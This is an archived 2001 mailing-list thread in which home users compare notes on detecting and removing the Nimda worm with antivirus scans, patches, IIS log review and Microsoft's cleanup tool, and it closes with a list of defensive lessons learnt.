RE: Re: Virus

["Brian G. Reynolds" <brian.g.reynolds@xxxxxxx>]

It seems I have not got rid of this virus as my checker is still reporting
it's presence!

It says there are more *.eml's but if I do a search I cannot find any!

I would be grateful of any assistance please,

TIA,

B.

> -----Original Message-----
> From: John McManus [mailto:john.mcmanus@xxxxxxx]
> Sent: 23 September 2001 11:27
> To: ukha_d@xxxxxxx
> Subject: Re: [ukha_d] Re: Virus
>
>
> Having poked into things a bit more...
>
> Looked at the IIS log files on the server (w2k), I saw dodgy URLs
being
> entered for my site.  These then invoked root.exe (which had been
> left over
> from a sadm virus that was not totally cleaned).  A couple of
> seconds after
> the external computer tried to fire up the IIS page, TFTP was
> invoked to the
> same address as the external browser (this was blocked by the
firewall).
>
> Went to the Microsoft site & downloaded the 'coderedcleanup.exe'
which
> removed the dodgy root.exe and tidied up a couple of other IIS things.
>
> Everything seems to be fine... for the moment!
>
> Lessons learnt:
> It is valuable to have defence in depth - firewalls, virus
> guards, log files
> for review.
> Backups are useful... but can be tricky to use if you are not sure
when
> exactly you were infected with the virus.
> If you are running IIS, it pays to review your log files regularly.
> hotfixchecker from Microsoft is useful to ensure you have all the
> appropriate patches.
> The time lost to virus attacks / fixes is a real PITA in a domestic
> environment.
>
> ----- Original Message -----
> From: <steve@xxxxxxx>
> To: <ukha_d@xxxxxxx>
> Sent: Sunday, September 23, 2001 10:43 AM
> Subject: [ukha_d] Re: Virus
>
>
> > If you are in win2k just look in taskman and see if
anythingunusual
> > is running.
> > if there is strange stuff happening, end task it, then find it in
you
> > computer and delete  it.
> >
> > if your on win98/95 and i think ME.
> > you cant see "all" running processes, so i have a neat
little utility
> > somewhere i made in VB which alows you to list ALL running
processes
> > and kill any of them, i think if i can find it, i will add, a
kill
> > and delete button aswell, or a kill and move button.
> >
> > interested?
> >
> > HTH steve
> > --- In ukha_d@y..., "John McManus"
<john.mcmanus@b...> wrote:
> > > I am in a difficult position as my virus scanner (NAV2001)
does not
> > show
> > > that I am infected, but the Zone Alarm Pro firewall suddenly
> > (Wednesday)
> > > started asking if I want to allow TFTP (trivial file
transfer
> > protocol) to
> > > connect to the internet.  I have also run a couple of the
'cleaner'
> > programs
> > > for Nimda virus... they too say I am not infected.
> > >
> > > Since I am not aware of any apps on the server that need to
use
> > TFTP (and
> > > the addresses that it is going to are other BT Internet
ones), I
> > guess I
> > > need to assume that I am infected with something and
reformat /
> > > re-install... a real PITA.
> > >
> > > Any thoughts would be appreciated.
> > > ----- Original Message -----
> > > From: "Brian G. Reynolds"
<brian.g.reynolds@n...>
> > > To: <ukha_d@y...>
> > > Sent: Saturday, September 22, 2001 7:42 PM
> > > Subject: RE: [ukha_d] Virus
> > >
> > >
> > > > Thanks Keith,
> > > >
> > > > I am using Norton AntiVirus 2001 recently bought, I
used its own
> > virus
> > > scan
> > > > routine, is there a better way?
> > > >
> > > > All the infected files were deleted.
> > > > I do use it's auto update and do it manually as well.
> > > >
> > > > Thanks for the info.
> > > >
> > > > B.
> > > > > -----Original Message-----
> > > > > From: Keith Doxey [mailto:ukha@xxxxxxx...]
> > > > > Sent: 22 September 2001 19:00
> > > > > To: ukha_d@y...
> > > > > Subject: RE: [ukha_d] Virus
> > > > >
> > > > >
> > > > > Thats probably it.
> > > > >
> > > > > How did you run yor virus scan?
> > > > > We ran it Windows "Find Files"
containing the text "whatever
> > you care to
> > > > > put" so that it was forced to open everyfile
on the machine, at
> > which
> > > time
> > > > > the AV software should find the infected files.
> > > > >
> > > > > Make sure you keep your anti virus software upto
date.
> > > > >
> > > > > At work we use VirusScan TC from McAfee.
> > > > > The Dat file was at version 4158 at the beginning
of the week
> > and by
> > > > > yesterday had reached 4162.
> > > > >
> > > > > At home I use eTrust EZ Antivirus. Its Dat file
has gone from
> > > > > 1491 on Monday
> > > > > to 1512 yesterday.
> > > > >
> > > > > One of the worst things about Nimda is that YOU
dont have to do
> > > > > anything to
> > > > > catch it. I have no doubt that there will be
several more
> > viruses
> > > > > that mimic
> > > > > the HTML method employed by Nimda, namely using
Javascript to
> > Pop-Up a
> > > > > window at coordinates that wont show on the screen
and then try
> > to do
> > > > > malicious things to your machine. Disabling
Javascript would
> > stop that
> > > but
> > > > > would also stop many reputable web pages from
working and I
> > > > > believe most, if
> > > > > not all eCommerce sites would be less than useless
if you didnt
> > support
> > > > > Javascript.
> > > > >
> > > > > Once again a few idiots spoiling things for the
majority :-(
> > > > >
> > > > > Keith
> > > > >
> > > > > > -----Original Message-----
> > > > > > From: Brian G. Reynolds [mailto:brian.g.reynolds@xxxxxxx...]
> > > > > > Sent: 22 September 2001 15:33
> > > > > > To: ukha_d@y...
> > > > > > Subject: RE: [ukha_d] Virus
> > > > > >
> > > > > >
> > > > > > Thanks Keith, I should have known that :-(
> > > > > >
> > > > > > All .eml deleted.
> > > > > >
> > > > > > I have run the virus scan again and it does
not find any mere
> > > > > > does that mean
> > > > > > all is ok again?
> > > > > > Never had a virus before not sure when to
trust it again!
> > > > > >
> > > > > > I have already read the threads, I have
re-SP2'd and another
> > MS patch
> > > > > > q301625_w2k_sp3_x86_en.exe
> > > > > > Anything else or can I now breathe again!!
> > > > > >
> > > > > > Thanks,
> > > > > >
> > > > > > B.
> > > > > >
> > > > > > > -----Original Message-----
> > > > > > > From: Keith Doxey [mailto:ukha@xxxxxxx...]
> > > > > > > Sent: 22 September 2001 15:07
> > > > > > > To: ukha_d@y...
> > > > > > > Subject: RE: [ukha_d] Virus
> > > > > > >
> > > > > > >
> > > > > > > *.eml are email messages but the ones
that hyou have found
> > > > > will be loads
> > > > > > > with the same file size and datestamp.
> > > > > > >
> > > > > > > THEY ARE INFECTED WITH THE VIRUS .....
DELETE THEM.
> > > > > > >
> > > > > > > It also puts some codew in any HTML or
ASP files it finds
> > that
> > > > > > will infect
> > > > > > > any other PC viewing the pages.
> > > > > > >
> > > > > > > Read the previous threads from when
Graham was battling to
> > > > > remove Nimda.
> > > > > > >
> > > > > > > Keith
> > > > > > >
> > > > > > > > -----Original Message-----
> > > > > > > > From: Brian G. Reynolds [mailto:brian.g.reynolds@xxxxxxx...]
> > > > > > > > Sent: 22 September 2001 14:04
> > > > > > > > To: UKHA Group
> > > > > > > > Subject: [ukha_d] Virus
> > > > > > > >
> > > > > > > >
> > > > > > > > What are .eml files?
> > > > > > > > I assume something to do with the
web/html/IE?
> > > > > > > > It seems that these were the most
attacked, I have
> > > > > > > "quarantined" them but
> > > > > > > > not sure if I can delete them?
> > > > > > > >
> > > > > > > > Another PC has also been infected
but this time is seems
> > mostly
> > > > > > > > Psion files
> > > > > > > > so I have deleted them! subtle.
> > > > > > > >
> > > > > > > > Thanks,
> > > > > > > >
> > > > > > > > B.
> > > > > > > >
> > > > > > > >
> > > > > > > >
> > > > > > > > For more information: http://www.automatedhome.co.uk
> > > > > > > > Post message: ukha_d@y...
> > > > > > > > Subscribe:  ukha_d-subscribe@y...
> > > > > > > > Unsubscribe: 
ukha_d-unsubscribe@y...
> > > > > > > > List owner:  ukha_d-owner@y...
> > > > > > > >
> > > > > > > > Your use of Yahoo! Groups is
subject to
> > > > > > http://docs.yahoo.com/info/terms/
> > > > > > >
> > > > > > >
> > > > > > >
> > > > > >
> > > > > >
> > > > > >
> > > > > > For more information: http://www.automatedhome.co.uk
> > > > > > Post message: ukha_d@y...
> > > > > > Subscribe:  ukha_d-subscribe@y...
> > > > > > Unsubscribe:  ukha_d-unsubscribe@y...
> > > > > > List owner:  ukha_d-owner@y...
> > > > > >
> > > > > > Your use of Yahoo! Groups is subject to
> > > > http://docs.yahoo.com/info/terms/
> > > > >
> > > > >
> > > > >
> > > > >
> > > > >
> > > > > For more information: http://www.automatedhome.co.uk
> > > > > Post message: ukha_d@y...
> > > > > Subscribe:  ukha_d-subscribe@y...
> > > > > Unsubscribe:  ukha_d-unsubscribe@y...
> > > > > List owner:  ukha_d-owner@y...
> > > > >
> > > > > Your use of Yahoo! Groups is subject to
> > > http://docs.yahoo.com/info/terms/
> > > > >
> > > > >
> > > > >
> > > >
> > > >
> > > >
> > > > For more information: http://www.automatedhome.co.uk
> > > > Post message: ukha_d@y...
> > > > Subscribe:  ukha_d-subscribe@y...
> > > > Unsubscribe:  ukha_d-unsubscribe@y...
> > > > List owner:  ukha_d-owner@y...
> > > >
> > > > Your use of Yahoo! Groups is subject to
> > http://docs.yahoo.com/info/terms/
> > > >
> > > >
> > > >
> > > >
> > > >
> > > > For more information: http://www.automatedhome.co.uk
> > > > Post message: ukha_d@y...
> > > > Subscribe:  ukha_d-subscribe@y...
> > > > Unsubscribe:  ukha_d-unsubscribe@y...
> > > > List owner:  ukha_d-owner@y...
> > > >
> > > > Your use of Yahoo! Groups is subject to
> > http://docs.yahoo.com/info/terms/
> > > >
> > > >
> >
> >
> >
> > For more information: http://www.automatedhome.co.uk
> > Post message: ukha_d@xxxxxxx
> > Subscribe:  ukha_d-subscribe@xxxxxxx
> > Unsubscribe:  ukha_d-unsubscribe@xxxxxxx
> > List owner:  ukha_d-owner@xxxxxxx
> >
> > Your use of Yahoo! Groups is subject to
http://docs.yahoo.com/info/terms/
>
>



For more information: http://www.automatedhome.co.uk
Post message: ukha_d@xxxxxxx
Subscribe:  ukha_d-subscribe@xxxxxxx
Unsubscribe:  ukha_d-unsubscribe@xxxxxxx
List owner:  ukha_d-owner@xxxxxxx

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/